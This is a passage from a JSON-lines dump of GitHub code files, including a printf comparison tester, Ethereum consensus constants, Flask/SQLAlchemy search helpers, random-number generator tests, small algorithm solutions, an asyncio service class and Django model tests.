It will (or not) trigger other\n run submethods.\n \"\"\"\n print(colorize(self.msgs['welcome']))\n self.run_cmp_cases(cases_generator(), verbose=verbose, quiet=quiet,\n timeout=timeout)\n if self.counters['global_exit_err'] == 0:\n print('Running cases in current process...')\n cases = cases_generator()\n f = os.open(os.devnull, os.O_WRONLY)\n os.dup2(f, sys.stdout.fileno())\n for s in cases:\n for c in s['cases']:\n self.f2(*c)\n os.close(f)\n os.dup2(2, sys.stdout.fileno())\n l = subprocess.call(['leaks', str(os.getpid())])\n if l == 0:\n print(colorize('{succ}No leak found.{rst}'))\n elif l > 1:\n print(colorize('{fail}An error occured with leaks.{rst}'))\n else:\n print(colorize('{fail}Leaks found.{rst}'))\n else:\n print(colorize(\n (\n '\\n{red}Some subprocesses failed (non 0 exit statuses)'\n 'Leaks tests failed.{rst}\\n'\n )))\n\n def run_cmp_cases(self, cases, verbose=False, quiet=False, debug=False,\n timeout=0.15):\n \"\"\"\n This run submethod just run test sets by calling run_in_subprocess().\n \"\"\"\n self.counters['global_tried'] = 0\n self.counters['global_success'] = 0\n for case in cases:\n self.run_cmp_cases_subsets(case['name'], case, verbose=verbose,\n quiet=quiet, timeout=timeout)\n if self.counters['global_tried'] > 0:\n success = self.counters['global_tried'] == self.counters[\n 'global_success'\n ]\n col = colors['succ'] if success else colors['fail']\n print(\n colorize(self.msgs['global_res'], {'res': col})\n % (\n self.counters['global_success'],\n self.counters['global_tried'],\n )\n )\n if (self.counters['local_exit_err'] != 0):\n print(colorize(self.msgs['exit_err'])\n % (\n self.counters['local_exit_err']\n ))\n\n def run_cmp_cases_subsets(self, name, cases, verbose=False, quiet=False,\n timeout=0.15):\n \"\"\"\n This run submethod just run test subsets by calling\n run_in_subprocess().\n \"\"\"\n self.counters['local_tried'] = 0\n self.counters['local_success'] = 0\n self.counters['local_exit_err'] = 0\n print(colorize(self.msgs['subset_head'], {}) % (cases['name'],))\n for case in cases['cases']:\n self.run_cmp_case(name, case, verbose=verbose, quiet=quiet,\n timeout=timeout)\n if self.counters['local_tried'] > 0:\n success = (\n self.counters['local_tried'] == self.counters['local_success']\n )\n col = colors['succ'] if success else colors['fail']\n print(colorize(self.msgs['subset_res'], {'res': col})\n % (\n cases['name'],\n self.counters['local_success'],\n self.counters['local_tried']\n ))\n if (self.counters['local_exit_err'] != 0):\n print(colorize(self.msgs['exit_err'])\n % (\n self.counters['local_exit_err']\n ))\n\n \n def run_cmp_case(self, name, case, verbose=False, quiet=False,\n timeout=0.15):\n \"\"\"\n This method just runs an actual test by calling\n run_in_subprocess().\n \"\"\"\n res = {\n 'f1': self.run_in_fork(self.f1, case, timeout=timeout),\n 'f2': self.run_in_fork(self.f2, case, timeout=timeout)\n }\n self.interpret_cmp_results(case, res, verbose, quiet)\n print('results : local (%s) : [%s/%s], global : [%s/%s]' % (\n name,\n self.counters['local_success'],\n self.counters['local_tried'],\n self.counters['global_success'],\n self.counters['global_tried']\n ), end='\\r')\n\n \n def run_in_fork(self, function, case, timeout=0.15):\n \"\"\"\n This method runs a test case by passing it to both f1 and f2,\n and by running it in subprocesses.\n It monitors the output on STDOUT, the function's return and the\n child process exit status..\n \"\"\"\n pipes = {}\n pipes['output_r'], pipes['output_w'] = os.pipe()\n pipes['return_r'], 
pipes['return_w'] = os.pipe()\n pid = os.fork()\n if (pid < 0):\n raise Exception('unable to fork')\n elif (pid == 0):\n try:\n with Timeout(t=5) as t:\n os.close(pipes['output_r'])\n os.close(pipes['return_r'])\n os.dup2(pipes['output_w'], sys.stdout.fileno())\n return_fd = os.fdopen(pipes['return_w'], 'bw')\n #signal.signal(signal.SIGTERM, lambda s, f: handle_timeout(return_fd))\n ret = function(*case)\n except TimeoutError as e:\n pass\n finally:\n os.close(pipes['output_w'])\n return_fd.write(str(ret).encode('utf-8'))\n return_fd.close()\n sys.exit()\n else:\n res = {}\n res['status'] = 'timeout'\n res['output'] = ''\n res['return'] = -1\n os.close(pipes['output_w'])\n os.close(pipes['return_w'])\n # output_in = os.fdopen(pipes['output_r'], encoding='cp1252')\n output_in = os.fdopen(pipes['output_r'], mode='rb')#, encoding='utf8')\n return_in = os.fdopen(pipes['return_r'])\n try:\n with Timeout(t=timeout) as t:\n res['status'] = os.waitpid(pid, 0)[1]\n if res['status'] == 0:\n res['output'] = output_in.read()\n tmp = return_in.read()\n res['return'] = int(tmp)\n except TimeoutError as e:\n os.kill(pid, signal.SIGTERM)\n os.waitpid(pid, 0)\n finally:\n output_in.close()\n return_in.close()\n return res\n\n\n \n def interpret_cmp_results(self, case, res, verbose=False, quiet=False):\n \"\"\"\n This method manges the display of the results for comparison tests.\n It also stores the success/failure to count it in the final ratio.\n \"\"\"\n self.counters['local_tried'] += 1\n self.counters['global_tried'] += 1\n cols = {}\n m = None\n if res['f2']['status'] != 0:\n self.counters['global_exit_err'] += 1\n self.counters['local_exit_err'] += 1\n if (res['f1']['status'] == 0 and res['f2']['status'] == 0):\n out_ok = (res['f1']['output'] == res['f2']['output'])\n ret_ok = (res['f1']['return'] == res['f2']['return'])\n cols['res2'] = colors['succ'] if out_ok else colors['fail']\n cols['res1'] = colors['succ'] if ret_ok else colors['fail']\n if ret_ok and out_ok:\n self.counters['local_success'] += 1\n self.counters['global_success'] += 1\n if (not (ret_ok and out_ok)) or verbose and not quiet:\n m = (colorize(self.msgs['test_normal_res'], cols)\n % (\n self.counters['global_tried'],\n ', '.join([str(i) for i in case]),\n self.f1.__name__,\n self.f2.__name__,\n res['f1']['return'],\n res['f2']['return'],\n res['f1']['output'],\n res['f2']['output']\n ))\n elif (res['f1']['status'] == res['f2']['status']):\n cols['res1'] = colors['succ']\n cols['res2'] = colors['succ']\n cols['res'] = colors['ntrl']\n m = (colorize(self.msgs['test_err'], cols)\n % (\n self.counters['global_tried'],\n ', '.join([str(i) for i in case]),\n self.f1.__name__,\n self.f2.__name__,\n res['f1']['status'],\n res['f2']['status'],\n 'error on both case.'\n ))\n else:\n cols['res1'] = colors['succ']\n cols['res2'] = colors['fail']\n cols['res'] = colors['fail']\n m = (colorize(self.msgs['test_err'], cols)\n % (\n self.counters['global_tried'],\n ', '.join([str(i) for i in case]),\n self.f1.__name__,\n self.f2.__name__,\n res['f1']['status'],\n res['f2']['status'],\n 'different exit statuses.'\n ))\n if m and not quiet:\n print(m)\n\n# *************************************************************************** #\n\nif __name__ == '__main__':\n\n # *********************************************************************** #\n # Check Python version #\n # *********************************************************************** # \n\n # try:\n # assert sys.version_info >= (3,6)\n # except AssertionError as e:\n # print(\"Wrong version 
: Python >= 3.6 required\")\n # sys.exit(1)\n \n # *********************************************************************** #\n # Argument parser definition #\n # *********************************************************************** #\n\n parser = argparse.ArgumentParser(\n description='This is a ft_printf python testing tool.')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='this option enables successful results display.')\n parser.add_argument('-q', '--quiet', action='store_true',\n help=('this option disables any case results display.'\n 'It permits to have a short yet global view on '\n 'every test set result'))\n parser.add_argument('-u', '--uncolored', dest='colors',\n action='store_false', help='disable colors.')\n parser.add_argument('-t', '--timeout', dest='t',\n type=float, default=0.25,\n help=(\n 'Set timeout duration. 0 will disable short '\n 'timeout (but a default 5 seconds timeout is still'\n ' activated to clean any non-terminated'\n ' subprocess if the parent process can\\'t kill'\n 'it in case of timeout).'\n ))\n parser.add_argument('filename',\n help=(\n 'A valid python3 file containing a generator '\n 'called \"cases_generator\". This iterable will '\n 'contain several case sets that will be '\n 'dictionnaries. These dictionaries will have a'\n '\\'name\\' entry to describe the cases subset, and'\n ' a \\'cases\\' entry '\n ))\n args = parser.parse_args()\n\n # *********************************************************************** #\n # importing cases #\n # *********************************************************************** #\n\n version = (sys.version_info.major, sys.version_info.minor)\n if (version == (3, 4) or version >= (3, 6)):\n from importlib.machinery import SourceFileLoader\n m = SourceFileLoader(\n \"module.name\",\n os.path.abspath(args.filename)).load_module()\n elif (version == (3, 5)):\n import importlib.util\n spec = importlib.util.spec_from_file_location(\n \"module.name\", os.path.abspath(args.filename))\n m = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(m)\n else:\n print(\"Python version not supported (<3.4)\")\n sys.exit(1)\n cases_generator = m.cases_generator\n \n # *********************************************************************** #\n # Colors definition #\n # *********************************************************************** #\n\n def colored(s):\n return (s if args.colors else '')\n\n colors = {\n 'red': colored('\\033[91m'),\n 'cyan': colored('\\033[96m'),\n 'blue': colored('\\033[94m'),\n 'prpl': colored('\\033[95m'),\n 'grn': colored('\\033[92m'),\n 'yllw': colored('\\033[93m'),\n 'rst': colored('\\033[0m'),\n }\n\n colors['succ'] = colors['grn']\n colors['fail'] = colors['red']\n colors['case'] = colors['prpl']\n colors['ntrl'] = colors['yllw']\n\n def colorize(s, res={}):\n cols = colors\n cols.update(res)\n return (s.format(**cols))\n\n # *********************************************************************** #\n # Test sets defintion #\n # *********************************************************************** #\n\n t = Tester(printf, ft_printf)\n t.run(cases_generator=cases_generator,\n verbose=args.verbose, quiet=args.quiet, timeout=args.t)\n","repo_name":"vmonteco/YAPT","sub_path":"yapt.py","file_name":"yapt.py","file_ext":"py","file_size_in_byte":17431,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"26238024526","text":"# 
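yapt builds its sandbox by hand with `os.fork`/`os.pipe` because it exercises an in-process C function loaded via ctypes. For comparison, when the target is an external command, the standard library gives the same capture-with-timeout behaviour in a few lines (the command here is illustrative):

```python
import subprocess

try:
    res = subprocess.run(
        ["python3", "-c", "print('hi')"],
        capture_output=True, text=True, timeout=0.25,
    )
    print(res.returncode, res.stdout)
except subprocess.TimeoutExpired:
    # Analogous to yapt's Timeout/SIGTERM path: the child is killed for us.
    print("timed out")
```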
https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#misc\nfrom enum import Enum\n\nFAR_FUTURE_EPOCH = 2 ** 64 - 1\nJUSTIFICATION_BITS_LENGTH = 4\nMAX_VALIDATORS_PER_COMMITTEE = 2 ** 11\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#time-parameters-1\nMIN_VALIDATOR_WITHDRAWABILITY_DELAY = 2**8\nSHARD_COMMITTEE_PERIOD = 256\nMIN_ATTESTATION_INCLUSION_DELAY = 2**0\nSLOTS_PER_EPOCH = 2**5\nMIN_SEED_LOOKAHEAD = 2**0\nMAX_SEED_LOOKAHEAD = 2**2\nMIN_EPOCHS_TO_INACTIVITY_PENALTY = 2**2\nEPOCHS_PER_ETH1_VOTING_PERIOD = 2**6\nSLOTS_PER_HISTORICAL_ROOT = 2**13\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#state-list-lengths\nEPOCHS_PER_HISTORICAL_VECTOR = 2**16\nEPOCHS_PER_SLASHINGS_VECTOR = 2**13\nHISTORICAL_ROOTS_LIMIT = 2**24\nVALIDATOR_REGISTRY_LIMIT = 2**40\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#rewards-and-penalties\nPROPORTIONAL_SLASHING_MULTIPLIER_BELLATRIX = 3\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#gwei-values\nEFFECTIVE_BALANCE_INCREMENT = 2 ** 0 * 10 ** 9\nMAX_EFFECTIVE_BALANCE = 32 * 10 ** 9\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/capella/beacon-chain.md#execution\nMAX_WITHDRAWALS_PER_PAYLOAD = 2 ** 4\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#withdrawal-prefixes\nETH1_ADDRESS_WITHDRAWAL_PREFIX = '0x01'\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#validator-cycle\nMIN_PER_EPOCH_CHURN_LIMIT = 2 ** 2\nCHURN_LIMIT_QUOTIENT = 2 ** 16\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#max-operations-per-block\nMAX_ATTESTATIONS = 2 ** 7\n\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/altair/beacon-chain.md#sync-committee\nSYNC_COMMITTEE_SIZE = 2 ** 9\nBYTES_PER_LOGS_BLOOM = 2 ** 8\nMAX_EXTRA_DATA_BYTES = 2 ** 5\n\n\n# Local constants\nGWEI_TO_WEI = 10 ** 9\nSHARE_RATE_PRECISION_E27 = 10**27\nTOTAL_BASIS_POINTS = 10000\n\nMAX_BLOCK_GAS_LIMIT = 30_000_000\n\n\nclass Chain(Enum):\n MAINNET = \"mainnet\"\n GOERLI = \"goerli\"\n SEPOLIA = \"sepolia\"","repo_name":"NilFoundation/zkllvm-template","sub_path":"storage-proof-app/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"2572012382","text":"from models import app, db, Country, Disaster, Organization\nfrom schemas import (\n DisasterSchema,\n DisasterInstanceSchema,\n CountrySchema,\n CountryInstanceSchema,\n OrganizationSchema,\n OrganizationInstanceSchema,\n country_schema,\n disaster_schema,\n organization_schema,\n)\nimport flask_sqlalchemy\nfrom sqlalchemy import or_\nfrom query_finder import *\n\n\ndef search_countries(query, q):\n if q == None:\n return query\n\n queries = q.split(\" \")\n print(queries)\n\n items = []\n for item in queries:\n items.append(Country.name.ilike(\"%{}%\".format(item)))\n items.append(Country.languages.ilike(\"%{}%\".format(item)))\n items.append(Country.currencies.ilike(\"%{}%\".format(item)))\n items.append(Country.region.ilike(\"%{}%\".format(item)))\n items.append(Country.subregion.ilike(\"%{}%\".format(item)))\n\n query = query.filter(or_(*tuple(items)))\n return query\n\n\ndef filter_countries(query, queries):\n language = get_query(\"language\", queries)\n currency = get_query(\"currency\", queries)\n region = 
get_query(\"region\", queries)\n subregion = get_query(\"subregion\", queries)\n\n if language != None:\n query = query.filter(Country.languages.ilike(\"%{}%\".format(language[0])))\n\n if currency != None:\n query = query.filter(Country.currencies.ilike(\"%{}%\".format(currency[0])))\n\n if region != None:\n query = query.filter(Country.region.in_(region))\n\n if subregion != None:\n query = query.filter(Country.subregion.in_(subregion))\n\n return query\n\n\ndef sort_countries(sort, query):\n # sort = sort.split(\"-\")\n\n category = None\n if sort == \"name\":\n category = Country.name\n elif sort == \"population\":\n category = Country.population\n else:\n category = Country.id\n\n return query.order_by(category)\n","repo_name":"amodica/Diminishing-Disasters","sub_path":"backend/Country.py","file_name":"Country.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35841445423","text":"import random\nfrom matplotlib import pyplot as plt\n\nfrom chi_squarred import chi_squared_uniform, chi_squared_continuous, split_in_groups\nfrom gap import gap_test_discrete, gap_test_continue\nfrom kolmogorov_smirnov import kolmogorov_smirnov\nfrom poker import poker_test\nfrom generators import *\n\n\ndef open_file():\n with open(\"exp.txt\", \"r\") as e:\n for line in e:\n line = line.strip()\n if \".\" in line:\n line = line.split(\".\")[1]\n for c in line:\n yield int(c)\n\n\nif __name__ == '__main__':\n ## Répartition des décimales d’exponentielle\n ### Premier aperçu\n e_numbers = np.array(list(open_file()))\n print(f\"Les 2.000.000 premières décimales :\\n\"\n f\"{e_numbers}\")\n e_labels, e_counts = np.unique(e_numbers, return_counts=True)\n print(f\"Les chiffres apparaissant dans les décimales :\\n\"\n f\"{e_labels}\")\n print(f\"Leur fréquences d\\'apparition : \\n\"\n f\"{e_counts}\")\n df_e_numbers = {\"decimals\": e_numbers}\n plt.figure()\n plt.bar(e_labels, e_counts, color='palegreen')\n plt.savefig('histo_exp.png')\n plt.show()\n\n ### Test du Chi Carré\n print(f\"Test du Chi-Carré pour les décimales : \\n\"\n f\"{chi_squared_uniform(e_counts)}\")\n\n ### Test du Poker\n print(f\"Test du Poker pour les décimales : \\n\"\n f\"{poker_test(e_numbers)}\")\n\n ### Test du gap\n print(f\"Test du Gap pour les décimales : \\n \"\n f\"{gap_test_discrete(e_numbers, 0, 5)}\")\n\n ## Générateurs de nombres aléatoires\n\n ### Comparaison avec le générateur de Python\n python_numbers = []\n for _ in range(2000):\n python_numbers.append(random.uniform(0, 1))\n\n ### Techniques employées\n rng1 = Generator1(50)\n rng2 = Generator2(50)\n rng3 = Generator3(50)\n gen_numbers_1 = [rng1.random() for _ in range(2000)]\n gen_numbers_2 = [rng2.random() for _ in range(2000)]\n gen_numbers_3 = [rng3.random() for _ in range(2000)]\n\n print(f\"Résultats des générateurs : \\n\"\n f\"Générateur 1 : {split_in_groups(gen_numbers_1)} \\n\"\n f\"Générateur 2 : {split_in_groups(gen_numbers_2)} \\n\"\n f\"Générateur 3 : {split_in_groups(gen_numbers_3)} \\n\")\n\n ### Test du Chi Carré\n print(f\"Test du Chi Carré de nos générateurs : \\n\"\n f\"1 --> {chi_squared_continuous(gen_numbers_1)} \\n\"\n f\"2 --> {chi_squared_continuous(gen_numbers_2)} \\n\"\n f\"3 --> {chi_squared_continuous(gen_numbers_3)} \\n\"\n f\"Python -- > {chi_squared_continuous(python_numbers)}\")\n\n ### Test de Kolmogorov-Smirnov\n print(f\"Test de Kolmogorov-Smirnov pour notre générateur : \\n\"\n f\"1 --> {kolmogorov_smirnov(gen_numbers_1)} 
\\n\"\n f\"2 --> {kolmogorov_smirnov(gen_numbers_2)} \\n\"\n f\"3 --> {kolmogorov_smirnov(gen_numbers_3)} \\n\"\n f\"Python --> {kolmogorov_smirnov(python_numbers)}\")\n\n ### Test du gap\n print(f\"Test du gap pour notre générateur : \\n\"\n f\"1 --> {gap_test_continue(gen_numbers_1, 0.0, 0.5)} \\n\"\n f\"2 --> {gap_test_continue(gen_numbers_2, 0.0, 0.5)} \\n\"\n f\"3 --> {gap_test_continue(gen_numbers_3, 0.0, 0.5)} \\n\"\n f\"Python --> {gap_test_continue(python_numbers, 0.0, 0.5)}\")\n\n plt.figure()\n plt.hist(gen_numbers_1, color='palegreen', histtype='barstacked')\n plt.hist(python_numbers, color='darkblue', histtype='step')\n plt.legend({'Premier générateur', 'Python'}, loc=4)\n plt.savefig('generator1.png')\n plt.show()\n\n plt.figure()\n plt.hist(gen_numbers_2, color='palegreen', histtype='barstacked')\n plt.hist(python_numbers, color='darkblue', histtype='step')\n plt.legend({'Second générateur', 'Python'}, loc=4)\n plt.savefig('generator2.png')\n plt.show()\n\n plt.figure()\n plt.hist(gen_numbers_3, color='palegreen', histtype='barstacked')\n plt.hist(python_numbers, color='darkblue', histtype='step')\n plt.legend({'Troisième générateur', 'Python'}, loc=4)\n plt.savefig('generator3.png')\n plt.show()\n","repo_name":"laurencefloriani/simulation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37020356903","text":"from pathlib import Path\n\n### Dataset config ###\npath_dataset = Path(\"/home/yy/Coding/datasets/cifar10\")\n# path_dataset = Path(\"/home/wty/Coding/datasets/cifar10\")\nbatch_size = 128\nshuffle_size = 128 * 16\nimage_shape = (32, 32, 3)\nrepeat = 20\nuse_aug = True\ntrain_data_size = 50000 * repeat\n\n### Model config ###\nclass_num = 10\nencoder_stage_size = (3, 4, 6, 3)\n# encoder_stage_size = (2, 4, 4, 2)\ndecoder_stage_size = encoder_stage_size[::-1]\nfeature_size = 2048\n\n### Training config ###\ntotal_epochs = 5\n# learning_rate = 0.001\nlearning_rate = 5e-4\ncoef_kl_loss = 2.5e-3\n# coef_kl_loss = 1e-4\ncoef_cls_loss = 20.0\nflag_l2_image_loss = True\nflag_cosine_schedule = True\n","repo_name":"wty-yy/KataCV","sub_path":"katacv/G_VAE/constant_cifar10.py","file_name":"constant_cifar10.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38122890920","text":"#sorting\ndef isCovered(ranges, left, right):\n # Sort the ranges\n ranges.sort()\n\n # Initialize coverage with `left`\n coverage = left\n\n # Check each range\n for start, end in ranges:\n # If the start of the range can extend the coverage\n if start <= coverage + 1:\n # Update the coverage\n coverage = max(coverage, end)\n # If the coverage is greater than `right`\n if coverage >= right:\n # Return True since we have covered the entire required range\n return True\n\n # If we have not returned True by now, not all integers are covered\n return False\n\n#time O(nlogn)\n#space O(1)\n","repo_name":"0xspringtime/leetcode","sub_path":"1893n.py","file_name":"1893n.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25841276281","text":"''' 따뜻한 날씨 찾기 \nGiven a list of daily temperatures T, return a list such that, \nfor each day in the input, tells you how many days you would have to wait until a warmer temperature. 
\nIf there is no future day for which this is possible, put 0 instead.\n\nFor example, given the list of temperatures T = [73, 74, 75, 71, 69, 72, 76, 73], \nyour output should be [1, 1, 4, 2, 1, 1, 0, 0].\n\nNote: \n* The length of temperatures will be in the range [1, 30000]. \n* Each temperature will be an integer in the range [30, 100].\n'''\n\n# Push indices onto a stack and compare temperatures at each step\ndef warmdays(T:list) -> list:\n answer = [0] * len(T) # pre-fill the default values with 0 \n stack = []\n for i, cur in enumerate(T):\n while stack and cur > T[stack[-1]] : # if the current temperature is higher than the temperature at the stack's last index\n last = stack.pop() \n answer[last] = i - last # number of days between this day and the warmer day \n stack.append(i)\n return answer\n# indices never popped from the stack (no warmer temperature exists) keep the default answer of 0.\n\n# Reduce time complexity with one loop and conditional traversal via a stack. \n# Some positions are resolved with a single comparison instead of visiting every later element, \n# which is what saves time.\n\n\n\n# Time-limit-exceeded solution (brute force)\ndef warmdays(T:list) -> list:\n res = []\n \n for i in range(len(T) - 1):\n day = 0\n for j in range(i+1,len(T)):\n if T[i] < T[j]:\n day = j - i\n break \n res.append(day)\n res.append(0)\n return res","repo_name":"changdaeoh/Algorithm_study","sub_path":"ch9_Stack_Queue/Q22_Daily_Temperatures.py","file_name":"Q22_Daily_Temperatures.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"31340211999","text":"import asyncio\nimport datetime\nimport logging\nimport signal\nimport sys\nimport threading\nimport types\n\nfrom python_sdk.service import _service_config\n\n_HANDLED_SIGNALS = (\n signal.SIGINT, # Unix signal 2. Sent by Ctrl+C.\n signal.SIGTERM, # Unix signal 15. Sent by `kill <pid>`.\n)\nif sys.platform == \"win32\":\n _HANDLED_SIGNALS += (signal.SIGBREAK,) # Windows signal 21. Sent by Ctrl+Break.\n\n\nclass Service:\n config: _service_config.Config\n should_exit: bool\n should_force_exit: bool\n started_at: datetime.datetime | None\n\n def __init__(self, config: _service_config.Config) -> None:\n self.config = config\n self.should_exit = False\n self.should_force_exit = False\n self.started_at = None\n\n @property\n def elapsed_since_started(self) -> datetime.timedelta:\n if not self.started_at:\n return datetime.timedelta(seconds=0)\n return datetime.datetime.now(tz=datetime.timezone.utc) - self.started_at\n\n @property\n def _on_tick_callbacks(self) -> asyncio.Future:\n return asyncio.gather(\n self._set_should_exit_flag_if_arrived_at_configured_run_for(),\n )\n\n def run(self) -> None:\n asyncio.run(self._run())\n\n def run_in_background(self) -> asyncio.Task[None]:\n return asyncio.create_task(self._run())\n\n async def _run(self) -> None:\n self._reset()\n logging.debug(\"Starting service.\")\n await self._startup()\n if self.should_exit:\n logging.debug(\"Service stopped before it got started.\")\n return\n await self._main_loop()\n await self._shutdown()\n\n logging.debug(\"Service stopped.\")\n\n def _reset(self) -> None:\n \"\"\"\n Resets the service so it may be reused after a previous run finished.\n \"\"\"\n self.should_exit = False\n self.should_force_exit = False\n self.started_at = None\n\n async def _startup(self) -> None:\n self._install_signal_handlers()\n\n async def _shutdown(self) -> None:\n return\n\n async def _main_loop(self) -> None:\n self.started_at = datetime.datetime.now(tz=datetime.timezone.utc)\n task = asyncio.create_task(self.config.app.start())\n while not self.should_exit and not task.done():\n await asyncio.sleep(self.config.tick_interval.total_seconds())\n await self._tick()\n if not 
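A quick check of the stack-based `warmdays` above (either version, since both return the same result) against the expected output given in its docstring:

```python
assert warmdays([73, 74, 75, 71, 69, 72, 76, 73]) == [1, 1, 4, 2, 1, 1, 0, 0]
# 71 (index 3) and 69 (index 4) wait on the stack until 72 (index 5) pops both,
# giving waits of 2 and 1; 76 (index 6) is never popped, so its answer stays 0.
```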
task.done():\n await self.config.app.stop()\n\n async def _tick(self) -> None:\n await self._on_tick_callbacks\n\n def _install_signal_handlers(self) -> None:\n if threading.current_thread() is not threading.main_thread():\n # Signals can only be listened to from the main thread.\n return\n\n loop = asyncio.get_event_loop()\n\n try:\n for sig in _HANDLED_SIGNALS:\n loop.add_signal_handler(sig, self._handle_signal, sig, None)\n except NotImplementedError:\n # Windows\n for sig in _HANDLED_SIGNALS:\n signal.signal(sig, self._handle_signal)\n\n def _handle_signal(self, sig: int, frame: types.FrameType | None) -> None:\n logging.info(f\"Received signal. signal={signal.Signals(sig).name}\")\n if self.should_exit and sig == signal.SIGINT:\n self.should_force_exit = True\n else:\n self.should_exit = True\n\n async def _set_should_exit_flag_if_arrived_at_configured_run_for(self) -> None:\n if self.config.run_for and self.elapsed_since_started >= self.config.run_for:\n self.should_exit = True\n","repo_name":"lijok/python-sdk","sub_path":"src/python_sdk/service/_service.py","file_name":"_service.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43561229008","text":"# flake8: noqa\nimport pytest\nfrom demoproject.demoapp.models import (\n DemoModel,\n DemoModelCallableDefault,\n DemoModelDefault,\n DemoModelNone,\n Sender1,\n Sender2,\n SenderNotRegistered,\n)\nfrom django.forms.models import modelform_factory\nfrom django.urls import reverse\nfrom strategy_field.utils import fqn\n\n\ndef pytest_generate_tests(metafunc):\n func_name = metafunc.function.__name__\n values = ids = []\n if \"target\" in metafunc.fixturenames:\n if func_name.endswith(\"_lookup_in\"):\n values = [\n lambda o: [fqn(o.sender)],\n lambda o: [o.sender],\n lambda o: [fqn(Sender1), fqn(Sender2)],\n lambda o: [Sender1, Sender2],\n ]\n ids = [\"fqn(target.sender)\", \"target.sender\", \"fqn(Sender1)\", \"Sender1\"]\n else:\n values = [lambda o: fqn(Sender1), lambda o: Sender1]\n ids = [fqn(Sender1), \"Sender1\"]\n if \"demomodel\" in metafunc.fixturenames:\n values.extend([lambda o: fqn(o.sender), lambda o: o.sender])\n ids.extend([\"fqn(target.sender)\", \"target.sender\"])\n\n metafunc.parametrize(\"target\", values, ids=ids)\n\n\ndef test_field():\n d = DemoModel(sender=Sender1)\n assert d.sender == Sender1\n\n\n@pytest.mark.django_db\ndef test_model_save(target):\n d = DemoModel(sender=target(None))\n d.save()\n assert d.sender == Sender1\n\n\n@pytest.mark.django_db\ndef test_model_save_none():\n d = DemoModelNone(sender=None)\n d.save()\n assert d.sender is None\n\n\n@pytest.mark.django_db\ndef test_model_save_default():\n d = DemoModelDefault()\n d.save()\n # registry = d._meta.get_field_by_name('sender')[0].registry\n registry = d._meta.get_field(\"sender\").registry\n assert d.sender == registry[0]\n\n\n@pytest.mark.django_db\ndef test_model_save_default_with_callable():\n d = DemoModelCallableDefault()\n d.save()\n # registry = d._meta.get_field_by_name('sender')[0].registry\n registry = d._meta.get_field(\"sender\").registry\n assert d.sender == registry[0]\n\n\n@pytest.mark.django_db\ndef test_model_get_or_create(target):\n t = target(None)\n d, __ = DemoModel.objects.get_or_create(sender=t)\n assert d.sender == Sender1\n\n\n@pytest.mark.django_db\ndef test_model_load(demomodel):\n d = DemoModel.objects.get(pk=demomodel.pk)\n assert d.sender == Sender1\n\n\n@pytest.mark.django_db\ndef test_form(demomodel, 
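The `Service` record above ticks until `should_exit` is set, either by a signal or by `run_for` elapsing. A minimal driving sketch, assuming only what the code shows: `config.app` exposes async `start()`/`stop()` and `Config` carries `app`, `tick_interval`, and `run_for` (the `DummyApp` and the exact `Config` constructor are assumptions):

```python
import asyncio
import datetime

class DummyApp:
    """Stand-in app: start() runs until stop() is called."""
    def __init__(self):
        self._stopping = asyncio.Event()

    async def start(self):
        await self._stopping.wait()

    async def stop(self):
        self._stopping.set()

config = _service_config.Config(   # field names taken from the class body above
    app=DummyApp(),
    tick_interval=datetime.timedelta(seconds=0.5),
    run_for=datetime.timedelta(seconds=2),
)
Service(config).run()  # blocks ~2s; a tick then flips should_exit and we unwind
```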
registry):\n # demomodel._meta.get_field_by_name('sender')[0].registry = registry\n demomodel._meta.get_field(\"sender\").registry = registry\n form_class = modelform_factory(DemoModel, exclude=[])\n form = form_class(instance=demomodel)\n assert form.fields[\"sender\"].choices[1:] == registry.as_choices()\n\n\n@pytest.mark.django_db\ndef test_form_save(demomodel):\n form_class = modelform_factory(DemoModel, exclude=[])\n form = form_class({\"sender\": fqn(demomodel.sender)}, instance=demomodel)\n assert form.is_valid(), form.errors\n instance = form.save()\n assert instance.sender == demomodel.sender\n\n\n@pytest.mark.django_db\ndef test_form_not_valid(demomodel):\n form_class = modelform_factory(DemoModel, exclude=[])\n form = form_class({\"sender\": fqn(DemoModel)}, instance=demomodel)\n assert not form.is_valid()\n assert form.errors[\"sender\"] == [\n \"Select a valid choice. \"\n \"demoproject.demoapp.models.DemoModel \"\n \"is not one of the available choices.\"\n ]\n\n\n@pytest.mark.django_db\ndef test_form_default(demomodel):\n form_class = modelform_factory(DemoModel, exclude=[])\n form = form_class(instance=demomodel)\n assert form.fields[\"sender\"].choices == [\n (\"\", \"---------\"),\n (\"demoproject.demoapp.models.Sender1\", \"demoproject.demoapp.models.Sender1\"),\n (\"demoproject.demoapp.models.Sender2\", 